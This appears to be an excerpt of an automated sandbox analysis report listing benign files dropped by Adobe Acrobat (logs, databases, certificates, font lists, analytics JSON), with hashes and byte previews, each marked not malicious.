                            Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):322
                            Entropy (8bit):5.2098958833385485
                            Encrypted:false
                            SSDEEP:6:7Qf383+q2PRN2nKuAl9OmbzNMxIFUt8OQf33bZmw+OQf31rVkwORN2nKuAl9Ombg:7Qf9vaHAa8jFUt8OQfHb/+OQfb5JHAab
                            MD5:AA1A0FC7ECC0E184D3E2CBAD41BA8EE7
                            SHA1:6BC36FF1FED40A3AF43E42EA91F447E1E48E2450
                            SHA-256:E04FEC9E21231B0CE3CE45435290B3D189AA4A054D958B75E55B772DDA9FBD36
                            SHA-512:4397B9E866F8E9DBF97F84DFB4FEC33F2F8FFFD3CAB912D3476BBF7A3A2298AA3B7A8ECC254D400E8BCB85297680BC6CF64E03DE29A82A4F3A702CBC01E68C72
                            Malicious:false
                            Preview:2024/12/17-19:01:39.454 1a08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/17-19:01:39.455 1a08 Recovering log #3.2024/12/17-19:01:39.457 1a08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):322
                            Entropy (8bit):5.2098958833385485
                            Encrypted:false
                            SSDEEP:6:7Qf383+q2PRN2nKuAl9OmbzNMxIFUt8OQf33bZmw+OQf31rVkwORN2nKuAl9Ombg:7Qf9vaHAa8jFUt8OQfHb/+OQfb5JHAab
                            MD5:AA1A0FC7ECC0E184D3E2CBAD41BA8EE7
                            SHA1:6BC36FF1FED40A3AF43E42EA91F447E1E48E2450
                            SHA-256:E04FEC9E21231B0CE3CE45435290B3D189AA4A054D958B75E55B772DDA9FBD36
                            SHA-512:4397B9E866F8E9DBF97F84DFB4FEC33F2F8FFFD3CAB912D3476BBF7A3A2298AA3B7A8ECC254D400E8BCB85297680BC6CF64E03DE29A82A4F3A702CBC01E68C72
                            Malicious:false
                            Preview:2024/12/17-19:01:39.454 1a08 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/17-19:01:39.455 1a08 Recovering log #3.2024/12/17-19:01:39.457 1a08 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                            Category:dropped
                            Size (bytes):65110
                            Entropy (8bit):2.318880123702442
                            Encrypted:false
                            SSDEEP:48:S00000000000000000000000000000000000000000000000000000000000000v:pEjciWdRurdqbcmq+djo
                            MD5:4A42941D8E62A9FF7AF9B9CF5EFC0C08
                            SHA1:6B69D4AC202C4A8B96C239EE30E2D97859D744E0
                            SHA-256:A40AB60F32F71331BFF363AB91FA6CEA0B53855DEC3E6A3B7460FA1136A2E000
                            SHA-512:9B430362B480F901B90BAA2CC696E7F0C2D5DF4D65170F2730E2C28A6CC797C47ACFAB55AF5AF4FC3411617E8878DFBD72ADA4565FED983B7D7272300866B49D
                            Malicious:false
                            Preview:BMV.......6...(...k...h..... .........................$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$" .$"
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                            Category:dropped
                            Size (bytes):57344
                            Entropy (8bit):3.291927920232006
                            Encrypted:false
                            SSDEEP:192:vedRBvVui5V4R4dcQ5V4R4RtYWtEV2UUTTchqGp8F/7/z+FP:veBci5H5FY+EUUUTTcHqFzqFP
                            MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                            SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                            SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                            SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                            Malicious:false
                            Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:SQLite Rollback Journal
                            Category:dropped
                            Size (bytes):16928
                            Entropy (8bit):1.2154589783773864
                            Encrypted:false
                            SSDEEP:24:7+tdlQXqLi+zkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9Mzmt:7MdlUqLmFTIF3XmHjBoGGR+jMz+LhX
                            MD5:7D568AAA35D72333064DE0975789BEC7
                            SHA1:5A9CB6E4A4CA46CFDE8984E577D79CA1B302AD3A
                            SHA-256:EDA5929338E066B7EBCF1B20E9653707FE77928E2AFB7321A13C616BA07607E5
                            SHA-512:DCAB521BA831526B9EDDDB4E96A78C5A9A06DDDFCB9B7849C5F4EB231A61CCC4B3D7C3BA5380722F66410147DE158F9278162AFAE55A172C0C8A187382F53DE4
                            Malicious:false
                            Preview:.... .c.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:Certificate, Version=3
                            Category:dropped
                            Size (bytes):1391
                            Entropy (8bit):7.705940075877404
                            Encrypted:false
                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                            Malicious:false
                            Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                            Category:dropped
                            Size (bytes):71954
                            Entropy (8bit):7.996617769952133
                            Encrypted:true
                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                            Malicious:false
                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):192
                            Entropy (8bit):2.7673182398396405
                            Encrypted:false
                            SSDEEP:3:kkFklCyvPpvfllXlE/HT8k8hl1NNX8RolJuRdxLlGB9lQRYwpDdt:kKbyvPpQT8p3NMa8RdWBwRd
                            MD5:544044CC39BE53AD1452A64F1C5C7F84
                            SHA1:9780F610DCA7D0B27769BB6F9A05BC5D1F164C31
                            SHA-256:AD3D1F6EB979E610DDCD04F272942029EB7B2142BCE23A3D3E621D759145422F
                            SHA-512:C5F05182EAFF79C968C68BCF4B798616BAB431556CFD4B6A610173DC98ADDAB45BCE2579B6BF9B952416AA715FFE2E3A763E9316800C67B66A6C6BCED8D3D512
                            Malicious:false
                            Preview:p...... .........a>..P..(....................................................... ..........W....&...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:data
                            Category:modified
                            Size (bytes):328
                            Entropy (8bit):3.247897867253901
                            Encrypted:false
                            SSDEEP:6:kKgW9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:YZDImsLNkPlE99SNxAhUe/3
                            MD5:63623E54957413D95B7B13A8D8396A37
                            SHA1:D53F1658273BB3845301DAC9C41D739FA09EC7E5
                            SHA-256:68BFC662DCC2BACABF6669EEBBD76B94CD79E6F6BB3AEFB43B73DD936109664A
                            SHA-512:AB4C9182EB608EBD1C6722476169037FE71187B5E1133F5FCD3C7FEE497F4D4DDA716DF4BFC255B722EB1CAA1766679D27C1B293CABDC29080A11EC24C6D92B4
                            Malicious:false
                            Preview:p...... ........K.*..P..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):1233
                            Entropy (8bit):5.233980037532449
                            Encrypted:false
                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                            Malicious:false
                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):1233
                            Entropy (8bit):5.233980037532449
                            Encrypted:false
                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                            Malicious:false
                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):1233
                            Entropy (8bit):5.233980037532449
                            Encrypted:false
                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                            Malicious:false
                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):10880
                            Entropy (8bit):5.214360287289079
                            Encrypted:false
                            SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                            MD5:B60EE534029885BD6DECA42D1263BDC0
                            SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                            SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                            SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                            Malicious:false
                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PostScript document text
                            Category:dropped
                            Size (bytes):10880
                            Entropy (8bit):5.214360287289079
                            Encrypted:false
                            SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                            MD5:B60EE534029885BD6DECA42D1263BDC0
                            SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                            SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                            SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                            Malicious:false
                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):295
                            Entropy (8bit):5.36179713217655
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJM3g98kUwPeUkwRe9:YvXKXJREaK9WRuUhU55GMbLUkee9
                            MD5:ED902B68297E0ED2E74F8CC9BC3ACEA2
                            SHA1:EAE6CC0C0462410873327CDF5CBB0A708B6A9FE5
                            SHA-256:DB4323D232BCD313FD31806F6C202E54AB993C806B4937D944FD27D021288A15
                            SHA-512:E287C6D60C63FEEC785C4B422FAC929681BE06B15F6CCDAF244ABF91C22DCCE568113BE2CDF54CF224B8A80A9AC7A7BA9A674853E322394C987E0A70F14470F6
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):294
                            Entropy (8bit):5.30951572111501
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJfBoTfXpnrPeUkwRe9:YvXKXJREaK9WRuUhU55GWTfXcUkee9
                            MD5:740329551D7C3D6DBBB6A461B8316CFA
                            SHA1:59E66C0B11D9BC96F89C60A30F6CABBE1C2C75F8
                            SHA-256:A6122F978418A743C6AA68138A2B60A568F8D1C482DB0B4DC260C8AF00A0EBD7
                            SHA-512:D37F8B1CCF1E4E4DF70F69CD8E798FDB4CCCF8AA1CBF9693D65B9E63F0BA66C624A9246AA18B973AE588BFD6EA5CE31C77DAB7C2DF1E5E200E086B58498CC30B
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):294
                            Entropy (8bit):5.288783515029679
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJfBD2G6UpnrPeUkwRe9:YvXKXJREaK9WRuUhU55GR22cUkee9
                            MD5:B8B492AC1941D595C3174C7F104AE783
                            SHA1:DC0B103BF1CB4B067E7A730FC7B6FED1145F8584
                            SHA-256:6207645D2AA3F760845649820AB557F0CD04C8C637D05B130010AF4A52228A62
                            SHA-512:ECD5ACBEB0DDA0C742B33FC73FAC480323F7021EDE970A5F4506E2E42CBCD358D6BF1A975A087A43BCF416DF899631ACD762AEAEFC11DA6FF30D648612B38F71
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):285
                            Entropy (8bit):5.350122364631909
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXJRRaW9Kme5IRR4UhUR0YeyKoAvJfPmwrPeUkwRe9:YvXKXJREaK9WRuUhU55GH56Ukee9
                            MD5:CDE05E88DF4446726EEA08CEC513350E
                            SHA1:CD333C6384F07FC564A5FB8DE9A0CEC1415F50EA
                            SHA-256:47B20DE5A5E4398CBF7384CF4E60DA2743DF75CEDACC97C2A1702959F27DD08F
                            SHA-512:365AAF9D534AA6D1B93766597C27B01F77F359470BDE8B94AE8B82D607F4F6DEB093FAD4CAA2A24D82FBB48F277331E06F7194CF5BA57BBEF963BCB9AB859C11
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"75deedfd-c641-473a-ae30-705027075498","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1734658037326,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):1123
                            Entropy (8bit):5.68854796703573
                            Encrypted:false
                            SSDEEP:24:Yv6XdU8pLgE9cQx8LennAvzBvkn0RCmK8czOCCSXZ:YvSU8hgy6SAFv5Ah8cv/J
                            MD5:A5388D1D337FB2B6810F8EB8BDDDA558
